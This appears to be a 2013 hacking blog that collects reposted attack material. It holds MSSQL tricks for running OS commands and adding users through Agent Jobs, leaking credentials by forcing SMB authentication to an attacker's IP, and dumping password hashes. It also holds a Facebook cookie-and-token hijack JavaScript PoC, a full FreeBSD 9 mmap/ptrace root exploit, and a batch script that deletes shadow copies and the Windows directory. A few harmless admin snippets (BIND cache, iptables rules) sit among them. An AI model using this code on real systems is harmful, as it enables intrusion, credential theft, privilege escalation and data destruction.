Jun 22, 2013

Hacking Tricks - Microsoft SQL Server Edition

*** How to execute OS commands when xp_cmdshell was removed AND necessary DLLs deleted ***
You will find tons of references about how to re-enable xp_cmdshell stored procedure if it was disabled. The recent versions of Microsoft SQL Server comes with xp_cmdshell stored procedure disabled by default, and all that you need to do to re-enable is execute the following commands with an administrative account.
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
But what if xp_cmdshell was removed?
You will need to re-create it using sp_addextendedproc and the associated DLL. For Microsoft SQL Server 2000 you will need to execute one the following queries:
EXEC sp_addextendedproc 'xp_cmdshell', 'xplog70.dll' 
OR
EXEC sp_addextendedproc xp_cmdshell, 'C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll'
However, if the associated DLL file was deleted you need to find another way. This trick may save you hours of research :)
There are different ways, but I like to use Agent Job feature. I suggest installing sqsh (Linux), or another robust MSSQL client, to execute the following query:
DECLARE @jobID uniqueidentifier, @cmd varchar(1000)
SET @cmd = 'net user SpiderLabs TW-SPL5562 /ADD'
EXEC msdb.dbo.sp_add_job @job_name = '_tmp_MakeDirectory', @enabled  = 1, @start_step_id = 1, @owner_login_name='sa', @job_id = @jobID OUTPUT
EXEC msdb.dbo.sp_add_jobstep @job_id = @jobID, @step_name = 'Create Backup Folder', @step_id = 1, @subsystem = 'CMDEXEC', @command = @cmd
EXEC msdb.dbo.sp_add_jobserver @job_id = @jobID
EXEC msdb.dbo.sp_start_job @job_id = @jobID, @output_flag = 0
WAITFOR DELAY '000:00:05'
IF EXISTS (SELECT name FROM msdb.dbo.sysjobs WHERE name = '_tmp_MakeDirectory')
BEGIN
     EXEC msdb.dbo.sp_delete_job @job_name = '_tmp_MakeDirectory'
END
go
OK, this code is not simple as call xp_cmdshell, but it will do the same (execute OS commands). Just replace the line "SET @cmd = 'net user SpiderLabs TW-SPL5562 /ADD'" with the command that you want to execute. The example code once executed will create a local user called SpiderLabs and password TW-SPL5562.

*** How to escalate privileges on MSSQL via stored procedure + UNC ***
Basically we will setup a rogue SMB authentication server to steal credentials and force the Microsoft SQL Server database to connect to us and leak their credential. You may want to use SMB Relay attack instead, it's up to you.
1) Start Responder Tool (https://github.com/SpiderLabs/Responder) from my friend Laurent Gaffie or whatever you want.
2) Execute the following stored procedure:
EXEC Master.dbo.xp_DirTree "\\YourIP\x",1,1;
You just need to replace "YourIP" with the IP address of the system (attacker machine) running Responder tool.
At this point a SMB connection from Microsoft SQL Server was sent to your IP address (attacker controlled machine).
You may try downgrade attacks to use HALFLM rainbow tables or SMB relay attack to obtain access to another system with this credential.
There are tons of other stored procedures that leak Microsoft SQL Server credential via SMB, but it's your homework. :)

*** How to dump local MS-SQL server hashes from a Windows system if you don’t have access to this database ***
First of all you need to have administrative access on the Windows system.
From the cmd.exe just type the following command for MSSQL 2000:
osql -E -Q "SELECT name,password from master.dbo.sysxlogins"
From the cmd.exe just type the following command for MSSQL 2005:
osql -E -Q "SELECT name,password_hash FROM sys.sql_logins"
The tool "osql" is installed with Microsoft SQL Server and the option "-E" will try to authenticate on the database with your current Windows login account. 

Source: http://blog.spiderlabs.com/2013/06/wendels-small-hacking-tricks-microsoft-sql-server-edition.html


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: DNS Caching Command In Linux


To dump or export the DNS cache of Bind server in Linux, issue following command:
 rndc dumpdb -cache
Path of the dump file Centos chrooted bind is:
cat /var/named/chroot/var/named/data/cache_dump.db
Path may be different depending on your linux distribution.

Flush DNS
rndc flush
rndc restart
rndc exec
rndc status
rndc reload

/etc/init.d/nscd restart
/etc/init.d/named restart




Source:  http://www.learnacad.com/component/content/article/35-centos/287-how-to-dump-the-bind-dns-cache-in-linux.html

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jun 21, 2013

Facebook Comment's Picture Hijacking

-----Javascript Facebook Picture Hijack PoC----
 
var yourMessage = "check out my pic"; // your msg
var photofbID = XXXXXXXXXX; // victim photo ID
var statuslinkID = XXXXXXXXXX ; //status ID where to comment with hijack
 
function generatePhstamp(b, g) {
var f = b.length;
numeric_csrf_value = '';
for (var c = 0; c < g.length; c++) {
numeric_csrf_value += g.charCodeAt(c)
}
return '1' + numeric_csrf_value + f
}
var e = document.getElementsByName('fb_dtsg')[0].value,
c = document.cookie.split('c_user=')[1].split(';')[0],
h = "ft_ent_identifier="+statuslinkID+"&comment_text="+yourMessage +"&source=1&client_id=1371674471412:1000847939&attached_photo_fbid="+photofbID+"&rootid=u_ps_0_0_m&ft[tn]=[]&ft[qid]=5891294842807711448&ft[mf_story_key]:-2575904214724011317&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user=" + c + "&__a=1&__dyn=7n8aD5z5CF-&__req=1r&fb_dtsg=" + e;
m = generatePhstamp(h, e);
h += "&phstamp=" + m;
picture = new XMLHttpRequest();
picture.setRequestHeader("Content-type", "application/x-javascript; charset=utf-8");
picture.send(h);
console.log("The pic has been Hijacked & posted at http://facebook.com/"+statuslinkID);
 
# C21C8F0A214D3F86   1337day.com [2013-06-21]   69C7CC3775144A2C #
 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jun 20, 2013

FreeBSD 9.{0,1} mmap/ptrace exploit [Privilege Escalation]

/*
* FreeBSD 9.{0,1} mmap/ptrace exploit
* by Hunger <fbsd9lul () hunger hu>
*
* Happy Birthday FreeBSD!
* Now you are 20 years old and your security is the same as 20 years ago... :)
*
* Greetings to #nohup, _2501, boldi, eax, johnny_b, kocka, op, pipacs, prof,
* sd, sghctoma, snq, spender, s2crew and others at #hekkcamp:
* I hope we'll meet again at 8 () 1470n ;)
*
* Special thanks to proactivesec.com
*

$ uname -a
FreeBSD fbsd91x64 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r243825: Tue Dec
4 09:23:10 UTC 2012
root () farrell cse buffalo edu:/usr/obj/usr/src/sys/GENERIC amd64
$ id
uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
$ gcc fbsd9lul.c -o fbsd9lul
$ ./fbsd9lul
FreeBSD 9.{0,1} mmap/ptrace exploit
by Hunger <fbsd9lul () hunger hu>
# id
uid=0(root) gid=0(wheel) egid=1002(hunger) groups=1002(hunger)
#

*/

#include <err.h>
#include <errno.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/wait.h>

#define SH "/bin/sh"
#define TG "/usr/sbin/timedc"

int
main(int ac, char **av) {
int from_fd, to_fd, status;
struct stat st;
struct ptrace_io_desc piod;
char *s, *d;
pid_t pid;

if (geteuid() == 0) {
setuid(0);
execl(SH, SH, NULL);
return 0;
}

printf("FreeBSD 9.{0,1} mmap/ptrace exploit\n");
printf("by Hunger <fbsd9lul () hunger hu>\n");

if ((from_fd = open(av[0], O_RDONLY)) == -1 ||
(to_fd = open(TG, O_RDONLY)) == -1)
err(1, "open");

if (stat(av[0], &st) == -1)
err(2, "stat");

if (((s = mmap(NULL, (size_t)st.st_size, PROT_READ,
MAP_SHARED, from_fd, (off_t)0)) == MAP_FAILED) ||
(d = mmap(NULL, (size_t)st.st_size, PROT_READ,
MAP_SHARED|MAP_NOSYNC, to_fd, (off_t)0)) == MAP_FAILED)
err(3, "mmap");

if ((pid = fork()) == -1)
err(4, "fork");

if (!pid) {
if (ptrace(PT_TRACE_ME, pid, NULL, 0) == -1)
err(5, "ptraceme");

return 0;
}

if (ptrace(PT_ATTACH, pid, NULL, 0) == -1)
err(6, "ptattach");

if (wait(&status) == -1)
err(7, "wait");

piod.piod_op = PIOD_WRITE_D;
piod.piod_offs = d;
piod.piod_addr = s;
piod.piod_len = st.st_size;

if (ptrace(PT_IO, pid, (caddr_t)&piod, 0) == -1)
err(8, "ptio");

execl(TG, TG, NULL);

return 0;
}



Source:  http://cxsecurity.com/issue/WLB-2013060170

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: What is equivalent 'rm -rf /' on Windows?

Create Batch Script in Windows like this .bat 
 
@echo off
echo Taking ownership....
takeown /f c:\* >nul 2>nul
takeown /f %windir%\* >nul 2>nul
takeown /f %windir%\system32 >nul 2>nul
takeown /f %windir%\system32\* >nul 2>nul
takeown /f %windir%\system32\drivers >nul 2>nul
takeown /f %windir%\system32\drivers\*  >nul 2>nul
takeown /f c:\recovery >nul 2>nul
takeown /f c:\recovery\* >nul 2>nul
takeown /f c:\perflogs >nul 2>nul
takeown /f c:\perflogs\* >nul 2>nul

icacls c:\* /grant administrators:f /t >nul 2>nul
icacls %windir% /grant administrators:f /t >nul 2>nul
icacls %windir%\* /grant administrators:f /t >nul 2>nul
icacls %windir%\system32 /grant administrators:f /t >nul 2>nul
icacls %windir%\system32\* /grant administrators:f /t >nul 2>nul
icacls %windir%\system32\drivers /grant administrators:f /t >nul 2>nul
icacls %windir%\system32\drivers\* /grant administrators:f /t >nul 2>nul
icacls c:\recovery /grant administrators:f /t >nul 2>nul
icacls c:\recovery\* /grant administrators:f /t >nul 2>nul
icacls c:\perflogs /grant administrators:f /t >nul 2>nul
icacls c:\perflogs\* /grant administrators:f /t >nul 2>nul

echo Nuking system files...
vssadmin delete shadows /All /Quiet >nul 2>nul 
vssadmin delete shadows /All /Quiet >nul 2>nul 
rmdir c:\PrefLogs /s /q >nul 2>nul 
rmdir c:\Recovery /s /q >nul 2>nul
rmdir "C:\System Volume Information" /s /q >nul 2>nul
rmdir c:\Windows /s /q >nul 2>nul

echo Done
 
Source: http://astr0baby.wordpress.com/2013/06/19/windows-equivalent-of-rm-rf/ 






If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jun 19, 2013

Howto: Preventing SSH from brute force attack

iptables -N bruteprotect
iptables -A bruteprotect -m recent --set --name BRUTEFORCE --rsource
iptables -A bruteprotect -m recent ! --update --seconds 60 --hitcount 4 --name BRUTEFORCE --rsource -j  RETURN
iptables -A bruteprotect -j LOG --log-prefix "[DROP BRUTEFORCE] : " --log-tcp-options --log-ip-options
iptables -A bruteprotect -j DROP


You can change threshold value with 3rd line
Source: http://www.dd-wrt.com/wiki/index.php/Preventing_Brute_Force_Attacks

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jun 16, 2013

Howto: Hack Your Linux System Without Using Single User Mode

As a kernel parameter we added ‘1‘ in the above process however now we will be adding ‘init=/bin/bash’ and boot using ‘b‘.

Single User Mode

Source: http://www.tecmint.com/how-to-hack-your-own-linux-system/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |